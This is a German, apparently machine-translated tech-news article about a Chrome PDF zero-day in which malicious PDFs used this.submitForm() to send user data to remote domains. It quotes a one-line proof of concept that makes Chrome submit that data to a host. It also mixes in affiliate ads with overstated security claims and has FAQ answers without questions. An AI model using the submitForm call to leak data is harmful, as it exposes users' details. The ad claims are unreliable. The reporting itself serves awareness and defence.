- EdgeSpot hat eine faszinierende Zero-Day-Sicherheitslücke entdeckt, die PDF-Dokumente in Chrome ausnutzt.
- Diese Verletzlichkeit kann Ihnen schaden, indem Sie die sensiblen Daten auf Ihrem PC sammeln.
- Entdecken Sie unsere Web- und Cloud-Seite für weitere Einblicke in andere Tools und Dienste.
- Wenn Sie sich für Browser interessieren, informieren wir Sie in unserem Browser-Hub.
Machen Sie alle Ihre Dokumente mit dem Adobe Acrobat Reader zugänglich und sicher. Mit diesem Dokumentenmanagement-Tool können Sie auch elektronische Formulare unterschreiben und offizielle Formulare erstellen, um Ihre Zeit bei der Arbeit zu sparen. Holen Sie es für Ihren PC und Sie können:
- Öffnen, drucken und bearbeiten Sie alle Ihre PDF- und anderen Dateitypen
- PDF-Formulare einfacher ausfüllen
- Halten Sie Ihre wichtigen Dokumente verschlüsselt
Holen Sie sich alle Apps zum Sonderpreis!
Die weltweit führende Dokumentenmanagement-Software ist jetzt zu einem günstigen Preis erhältlich, also beeilen Sie sich!
Der Exploit-Erkennungsdienst EdgeSpot hat ein faszinierendes Chrom Zero-Day-Schwachstelle, die PDF-Dokumente ausnutzt.
Die Schwachstelle ermöglicht es Angreifern, sensible Daten sammeln mit bösartigen PDF-Dokumenten, die in Chrome geöffnet wurden.
Sobald das Opfer die entsprechenden PDF-Dateien in Google Chrome öffnet, beginnt im Hintergrund ein Schadprogramm zu arbeiten, indem es Nutzerdaten sammelt.
Die Daten werden dann an den Remote-Server weitergeleitet, der von den Hackern kontrolliert wird. Sie fragen sich vielleicht, welche Daten von den Angreifern angesaugt werden, sie zielen auf die folgenden Daten auf Ihrem PC ab:
- IP Adresse
- Vollständiger Pfad der PDF-Datei auf dem System
- OS- und Chrome-Versionen
Vorsicht vor Malware-verseuchten PDF-Dateien
Experten gesichtet dass eine der beiden Domänen readnotify[.]com oder burpcollaborator[.]net erhielt die Daten.
Sie enthüllten, dass die Angreifer die this.submitForm() PDF-JavaScript-API zum Sammeln der sensiblen Informationen der Benutzer.
Wir haben es mit einem minimalen PoC getestet, einem einfachen API-Aufruf wie this.submitForm(‘ http://google.com/test’) veranlasst Google Chrome, die personenbezogenen Daten an google.com zu senden.
Dieser Chrome-Bug wurde von zwei verschiedenen Gruppen bösartiger PDF-Dateien ausgenutzt, die beide im Oktober 2017 bzw. September 2018 im Umlauf waren.
Insbesondere können die gesammelten Daten von den Angreifern verwendet werden, um zukünftige Angriffe zu verfeinern. Berichten zufolge wurde der erste Stapel von Dateien mit dem PDF-Tracking-Dienst von ReadNotify kompiliert.
Benutzer können den Dienst nutzen, um Benutzeransichten zu verfolgen. EdgeSpot hat keine Details zur Beschaffenheit des zweiten Satzes von PDF-Dateien mitgeteilt.
Kurzer Tipp: Ändern Sie Ihren Browser auf Opera
In diesen unruhigen Zeiten werden wir bei jedem Schritt mit Malware, Phishing und Trojanern angegriffen, daher müssen wir viel wachsamer sein und geschützt bleiben.
Da dies ein Chrome-spezifisches Problem ist, können Sie diese und alle anderen Bedrohungen mit einem sicherheitsorientierten Browser wie. vermeiden Oper.
Dieser Browser verfügt über einen integrierten Werbeblocker, der solche Ablenkungen nicht nur beseitigt, sondern auch blockiert Analyseskripte, Tracking-Pixel und Methoden zum Sammeln Ihrer Daten.
Und wenn Sie absolut sicher sein wollen, dass Sie sich von jeder Gefahr fernhalten, gehen Sie hinter das eingebaute VPN Service, der für unbegrenzte Zeit zu 100% kostenlos genutzt werden kann.
Oper
Opera bietet mit dem integrierten Werbeblocker und dem kostenlosen VPN-Dienst den perfekten Schutz vor Bedrohungen!
Besuche die Website
Wie kann ich vor PDF-Schwachstellen geschützt bleiben?
Adobe Acrobat PRO herunterladen
Adobe und Chrome passen gut zusammen, wenn es um den Umgang mit PDF-Dateien geht. Durch die Installation der Adobe-Erweiterung für Chrome können Sie PDFs nach Ihren Wünschen überprüfen und bearbeiten, ohne Ihren bevorzugten Browser zu verlassen.
Trotz seiner robusten Struktur wird in PDF-Dateien versteckte Malware möglicherweise nicht erkannt, wenn Sie die Standardversion des Readers verwenden.
Die professionelle Version wird empfohlen, um Ihren Schutz zu gewährleisten und Ihre Daten von Hackern fernzuhalten.
Obwohl es nicht kostenlos ist, ist der Preis, den Sie zahlen müssen, für die Fülle an zusätzlichen Funktionen, die Sie genießen werden, einschließlich der verbesserten Sicherheit Ihrer PDF-Dateien, eher gering.
Es ist auch eine kostenlose 7-Tage-Testversion enthalten, damit Sie vor dem Kauf einen Vorgeschmack auf das gesamte Pro-Erlebnis bekommen.
Adobe Acrobat PRO
Halten Sie sich von Malware fern, indem Sie Adobe Acrobat PRO herunterladen. Es hat viel mehr Funktionen als die kostenlose Version und schützt Ihre Daten.
Besuche die Website
Wenn Sie beim Surfen im Internet sicher sein möchten, benötigen Sie ein vollwertiges Tool zur Sicherung Ihres Netzwerks. Jetzt privaten Internetzugang installieren und sichern Sie sich. Es schützt Ihren PC vor Angriffen beim Surfen, maskiert Ihre IP-Adresse und blockiert alle unerwünschten Zugriffe.
Der Exploit-Erkennungsdienst EdgeSpot wollte die Chrome-Benutzer auf die möglichen Risiken aufmerksam machen, da mit einer Veröffentlichung des Patches in naher Zukunft nicht zu rechnen war.
EdgeSpot hat Google im vergangenen Jahr über die Sicherheitslücke berichtet und das Unternehmen versprach, Ende April einen Patch zu veröffentlichen.
Sie können das Problem jedoch vorübergehend umgehen, indem Sie die empfangenen PDF-Dokumente lokal mit einer anderen Reader-App anzeigen.
Alternativ können Sie Ihre PDF-Dokumente auch in Chrome öffnen, indem Sie Ihre Systeme vom Internet trennen.
Häufig gestellte Fragen
Ja tut es. Wenn Sie jedoch eine breitere Auswahl wünschen, Entdecken Sie unsere Top-Picks für ChromPrivatsphäre Erweiterungen in diese komplette Anleitung.
THier sind viele Erweiterungen, die es ermöglichen PDFs wird bearbeitet. Prüfen aus unserer ausgezeichneter Führer über die besten PDF-Erweiterungen für Chrome.
Es tut es nicht, aber Sie können es schnell aktivieren. Hier ist unser umfassende Anleitung Informationen zum Aktivieren des QR-Code-Generators in Chrome.
